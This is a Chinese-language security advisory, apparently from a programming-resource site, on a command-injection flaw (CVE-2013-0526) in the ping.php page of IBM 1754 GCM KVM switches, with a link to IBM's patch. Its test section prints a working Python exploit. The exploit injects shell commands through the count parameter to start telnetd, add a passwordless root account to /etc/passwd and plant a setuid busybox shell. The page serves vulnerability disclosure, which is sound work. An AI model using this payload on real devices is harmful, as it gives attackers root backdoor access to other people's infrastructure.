发布日期:2013-08-16
更新日期:2013-08-20受影响系统:
IBM IBM 1754 GCM GCM32
IBM IBM 1754 GCM GCM16
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 61816
CVE(CAN) ID: CVE-2013-0526IBM 1754 GCM 系列在单一设备中提供了经由 IP 的 KVM 和串行控制台管理技术。IBM 1754 GCM16 Global Console Manager 1.18.0.22011、IBM 1754 GCM32 Global Console Manager 1.18.0.22011存在多个命令执行漏洞,成功利用这些漏洞后可导致攻击者用root权限执行任意命令。此漏洞源于webapp变量没有被正确过滤。ping.php里的$count及$size参数允许创建特制的URL,注入文本到exec(),在嵌入KVM的Linux上执行任意命令。<*来源:Alejandro Alvarez Bravo
链接:http://seclists.org/fulldisclosure/2013/Aug/180
http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5093509
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!from StringIO import StringIO
import pycurl
import re
sessid = "XXXXXXXXX"
target = "https://ip.of.kvm/ping.php" <https://172.30.30.40/ping.php>command = "/sbin/telnetd ; echo superb::0:0:owned:/:/bin/sh >> /etc/passwd
; cp /bin/busybox /tmp/su ; chmod 6755 /tmp/su ; echo done. now connect to
device using telnet with user target and pass target, then "/tmp/su -
superb""storage = StringIO()
c = pycurl.Curl()
c.setopt(c.URL, target)
c.setopt(c.SSL_VERIFYPEER,0)
c.setopt(c.SSL_VERIFYHOST,0)
c.setopt(c.WRITEFUNCTION,storage.write)
c.setopt(c.POSTFIELDS, "address=255.255.255.255&action=ping&size=56&count=1
; echo *E* ; " + command + " ; echo *E*")
c.setopt(c.COOKIE,"avctSessionId=" + sessid)try:
c.perform()
c.close()
except:
print ""content = storage.getvalue()
x1 = re.search(r"*E*(.*)*E*",content)
print x1.group(1).replace("<br />","
")建议:
--------------------------------------------------------------------------------
厂商补丁:IBM
---
IBM已经为此发布了一个安全公告(MIGR-5093509)以及相应补丁:MIGR-5093509:IBM GCM16 KVM Switch Remote Command Execution (CVE-2013-0526)
链接:http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5093509Oracle Java BytePackedRaster.verify() 签名整数溢出Juniper Networks JUNOS Space安全绕过漏洞(CVE-2013-5096)相关资讯 IBM 1754 GCM 本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您
|
易网时代-编程资源站